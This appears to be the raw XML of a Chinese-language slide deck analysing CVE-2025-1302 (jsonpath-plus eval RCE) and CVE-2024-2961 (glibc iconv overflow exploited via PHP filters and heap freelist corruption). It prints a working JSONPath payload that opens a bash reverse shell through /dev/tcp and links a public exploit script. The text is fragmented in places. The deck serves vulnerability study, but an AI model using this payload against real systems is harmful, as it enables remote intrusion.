            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd"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4205577" y="2540248"/>
            <a:ext cx="4056436" cy="100407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lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="8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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="914400">
              <a:buNone/>
            </a:pPr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2180201" y="3815715"/>
            <a:ext cx="8107188" cy="41553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lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/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39586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰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12788" y="701902"/>
            <a:ext cx="2727098" cy="177664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indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr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8926282" y="6476773"/>
            <a:ext cx="2563589" cy="159319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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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516000" y="776923"/>
            <a:ext cx="11160000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="accent2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16000" y="6543041"/>
            <a:ext cx="11160000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="accent2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55" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="81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900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195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343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490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86380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57855" indent="-186055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29225" y="3602355"/>
            <a:ext cx="3426260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0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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rPr>
              <a:t>JSONPATH-PLUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1">
                      <a:alpha val="20000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent2">
                      <a:alpha val="20000"/>
                    </a:schemeClr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  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="00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0980" y="2783840"/>
            <a:ext cx="4378325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CN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rPr>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="000005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599805" y="3408045"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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398520" y="2874010"/>
            <a:ext cx="1814830" cy="1157605"/>
            <a:chOff x="3398520" y="2874010"/>
            <a:chExt cx="1814830" cy="1157605"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="平行四边形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3398520" y="2874010"/>
              <a:ext cx="1814830" cy="1157605"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 29964"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="2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4280000" scaled="0"/>
            </a:gra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altLang="zh-CN" sz="1200" i="1"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78860" y="2919095"/>
              <a:ext cx="1259205" cy="1067435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sz="6000" i="1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0"/>
                  </a:gradFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="0B184D">
                        <a:alpha val="40000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="6000" i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 flipH="1">
            <a:off x="3684905" y="2665730"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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11525" y="4258310"/>
            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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712788" y="1864021"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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8636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用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8408" y="3702669"/>
            <a:ext cx="10843544" cy="24534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3. write-what-where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漏洞（分配任意地址）：由于已经通过分配大量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0x100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大小的块成功填充了堆，所以在内存中的某个位置有三个连续的空闲块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，其中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FL[100]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的头，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A-&gt;B-&gt;C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。可以分配这三个块（步骤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），然后再次释放它们（步骤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）。此时，空闲列表被反转：我们得到的是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C→B→A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。接着再次进行分配，但这次在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的偏移量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48h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处放置一个任意指针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0x1122334455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（步骤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）。再次释放它们（步骤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）后，状态与步骤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完全相同（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A→B→C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），但有一个小差异：在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C+48h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处存在一个任意指针。现在可以从块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执行溢出操作，这将改变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中包含的指针的位置。它现在指向了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C+48h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的位置，结果使得空闲列表变为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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B→ C+48h → 0x1122334455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289" y="319256"/>
            <a:ext cx="8618464" cy="3383413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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern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  <a:lvl2pPr marL="55753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900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48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95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43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90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38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85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/>
              <a:t>CVE-2024-2961</a:t>
            </a:r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712788" y="1864021"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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8636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用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6536" y="3906796"/>
            <a:ext cx="10843544" cy="24534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4.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由于对齐方式（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~0x1fffff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）和大小（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2MB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），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堆很容易识别，而在其顶部存在一个很有用的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_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zend_mm_heap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结构：首先，它控制了所有的自由列表。通过重写这些自由列表，我们能够获得任意数量、任意大小的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write-what-where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漏洞。利用这些漏洞，我们可以覆盖最后一个字段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custom_heap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，该字段包含了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emalloc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efree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erealloc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的替代函数（类似于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glibc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__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malloc_hook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及其同类）。接着，我们将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use_custom_heap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设置为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，并对一个桶调用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free()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方法，这样就能实现对一个可控参数的任意函数调用，此处将 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custom_heap._free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设置为 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函数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这样就可以在环境中执行任意的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bash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命令了。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2079" y="946056"/>
            <a:ext cx="6136105" cy="283186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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern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  <a:lvl2pPr marL="55753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900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48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95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43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90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38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85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/>
              <a:t>CVE-2024-2961</a:t>
            </a:r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712788" y="701902"/>
            <a:ext cx="2727098" cy="25398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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="任意多边形: 形状 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667753" y="1334631"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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1999" y="1133391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漏洞描述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4228" y="1902832"/>
            <a:ext cx="10843544" cy="7914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版本号为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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10.3.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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之前的 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jsonpath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-plus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软件包存在远程代码执行（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RCE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）漏洞，原因是输入验证不当，攻击者可以通过利用不安全的默认 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еvаl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=‘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ѕаfе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’模式执行系统上的任意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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67753" y="3073016"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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81999" y="2871776"/>
            <a:ext cx="251544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基础知识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4228" y="3624248"/>
            <a:ext cx="10843544" cy="20379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JSONPath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：一种用于从 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JSON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数据中提取特定部分的查询语言，它提供了一种简洁而强大的方式来定位和提取 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JSON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数据中的元素。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Jsonpath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-plus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：一个功能强大且灵活的 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JSONPath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实现，用于在 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JavaScript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环境中查询和操作 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JSON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数据结构。使用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eval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方法时，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path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参数为指定的搜索规则（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JSONPath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语法），可以被解析为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代码。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712788" y="701902"/>
            <a:ext cx="2727098" cy="25398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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="任意多边形: 形状 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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7033" y="1662781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漏洞原理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0441" y="3575839"/>
            <a:ext cx="10843544" cy="16224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漏洞点：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Jsonpath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-plus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eval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方法第一个参数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path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调用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eval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方法时，第一个参数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path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是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JSONPath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语法的匹配条件，同时也可以是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代码，如果是代码，会调用相应方法先执行，然后把结果作为匹配条件继续进行操作。此处的代码用户完全可控，且并未进行有效的过滤，因此可以在此处输入恶意代码实现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RCE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9853" y="1056373"/>
            <a:ext cx="5792137" cy="24189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712788" y="701902"/>
            <a:ext cx="2727098" cy="25398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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="任意多边形: 形状 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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8636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用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2788" y="2432222"/>
            <a:ext cx="10843544" cy="28689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将 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path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参数构造如下：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$..[?(p="console.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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this.process.mainModule.require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0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('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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child_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0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').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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execSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0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('bash -c \"bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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 &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0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/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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en-US" altLang="zh-CN" b="1" dirty="0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&gt;/&lt;port&gt; 0&gt;&amp;1\"').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0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())";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0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=''[['constructor']][['constructor']](p);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0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();)]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="800080"/>
              </a:highlight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其中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$..[?()]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为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JSONPath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语法，匹配根元素下所有内容，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[?()]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中为过滤条件。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语句内容为定义 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为调用方法执行连接远程主机命令（即反弹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）的字符串，然后通过构造函数生成函数（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ddd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），最后调用该方法执行命令。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29225" y="3602355"/>
            <a:ext cx="2417915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0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1">
                      <a:alpha val="20000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent2">
                      <a:alpha val="20000"/>
                    </a:schemeClr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  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="00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0980" y="2783840"/>
            <a:ext cx="4378325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CN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</a:rPr>
              <a:t>CVE-2024-2961</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="000005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599805" y="3408045"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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398520" y="2874010"/>
            <a:ext cx="1814830" cy="1157605"/>
            <a:chOff x="3398520" y="2874010"/>
            <a:chExt cx="1814830" cy="1157605"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="平行四边形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3398520" y="2874010"/>
              <a:ext cx="1814830" cy="1157605"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 29964"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="2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4280000" scaled="0"/>
            </a:gra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altLang="zh-CN" sz="1200" i="1"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42602" y="2991147"/>
              <a:ext cx="1131720" cy="923330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sz="6000" i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0"/>
                  </a:gradFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="0B184D">
                        <a:alpha val="40000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="6000" i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63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="0B184D">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000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 flipH="1">
            <a:off x="3684905" y="2665730"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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11525" y="4258310"/>
            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill>
            <a:miter lim="800000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712788" y="701902"/>
            <a:ext cx="2727098" cy="25398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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2024-2961</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="任意多边形: 形状 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1386640"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045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7034" y="1185400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漏洞描述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4228" y="1902832"/>
            <a:ext cx="4806156" cy="24534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GNU C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库 （也就是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glibc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2.39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及更早版本中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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iconv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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()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函数在将字符串转换为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ISO-2022-CN-EXT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字符集时，可能会使传递给它的输出缓冲区溢出最多 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4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个字节，这可能会导致应用程序崩溃或覆盖相邻变量。利用方式为将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PHP-filter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highlight>
                  <a:srgbClr val="800080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任意文件读取升级为任意命令执行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0773" y="1293395"/>
            <a:ext cx="5830839" cy="50020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712788" y="701902"/>
            <a:ext cx="2727098" cy="25398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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2024-2961</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674228" y="1394254"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045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8474" y="1193014"/>
            <a:ext cx="251544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基础知识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674228" y="1965063"/>
            <a:ext cx="10843544" cy="4530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PHP-filter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过滤器，本漏洞利用的是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convert.iconv.X.Y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（作用是将字符集从 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转换为 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Y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）。处理字符串时，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首先会获取流（即读取资源）。它将流存储在一系列桶中，这些桶是双向链接的结构，每个桶包含一定大小的缓冲区。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HTTP-Chunked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：一种非常简单的编码方式，它通过数据块（非堆内存块）发送数据。首先，发送一个以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ASCII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十六进制表示的大小，紧接着是一个换行符，然后是相应大小的数据块，再接一个换行符，以此类推，并通过发送大小为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chunk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来指示数据的结束。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堆：在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中进行内存分配时，使用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emalloc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(N)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函数，其中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是希望分配的字节数。返回的结果是一个指向能够存储至少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字节的内存块（即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chunk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）的指针。当完成对这块内存的使用后，通过调用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efree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ptr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来释放它。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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712788" y="1864021"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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7033" y="1662781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漏洞原理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4228" y="2777055"/>
            <a:ext cx="10843544" cy="36999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iconv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将其他字符集转换为 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ISO-2022-CN-EXT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时出现越界写入，以“劄”为例，其直接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encode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结果为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0"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\xe5\x8a\x84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”，而经过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iconv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的转换时，它变成了“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0"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x1b\x24\x2A\x48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”，显然溢出一字节，这里就是利用的关键。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堆中的空闲列表是一个单向链表，每个未分配的块在其前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个字节内包含指向下一个空闲块的指针。如果存在块之间的溢出，就会覆盖掉该指针，而即使只有一字节溢出，我们也能改变空闲列表指针，从而更改空闲列表，进而产生利用场景。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CVE-2025-1302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利用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EXP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https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py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140" y="1662781"/>
            <a:ext cx="5740695" cy="11113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25" y="1073592"/>
            <a:ext cx="3334470" cy="1172444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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId3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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern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  <a:lvl2pPr marL="55753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900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48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95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43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90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38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85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/>
              <a:t>CVE-2024-2961</a:t>
            </a:r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712788" y="1864021"/>
            <a:ext cx="366963" cy="36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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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8636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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2788" y="2984804"/>
            <a:ext cx="10843544" cy="3284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zlib.inflate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过滤器，将流膨胀到大小为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0x8000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bucket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中。该过滤器接收流并对其进行解压缩处理。为此目的，它会分配一个大小为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页（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0x8000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字节）的缓冲区并将流膨胀至其中。如果这个缓冲区不足以容纳全部数据时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它将再创建一个相同大小的新的缓存区域以存储剩余部分；以此类推。每次扩充出来的每个区块都会被加入到各自的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bucket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当中去。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dechunk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方法调整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bucket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大小，使其可以进入空闲列表。该过滤器用于解码经过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HTTP-chunked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编码的字符串。为了解决上述问题实现在每个桶中提供一个大小和一个数据块，不再简单地写入一个大小，而是在其前面填充大量的零，以实现在每个桶的最后不会读到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作为结束标志，而是将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作为下一个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chunk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size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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的一部分读入用于分配内存。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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771" y="875266"/>
            <a:ext cx="4157297" cy="19942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887" y="875266"/>
            <a:ext cx="4157297" cy="209430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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId3">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
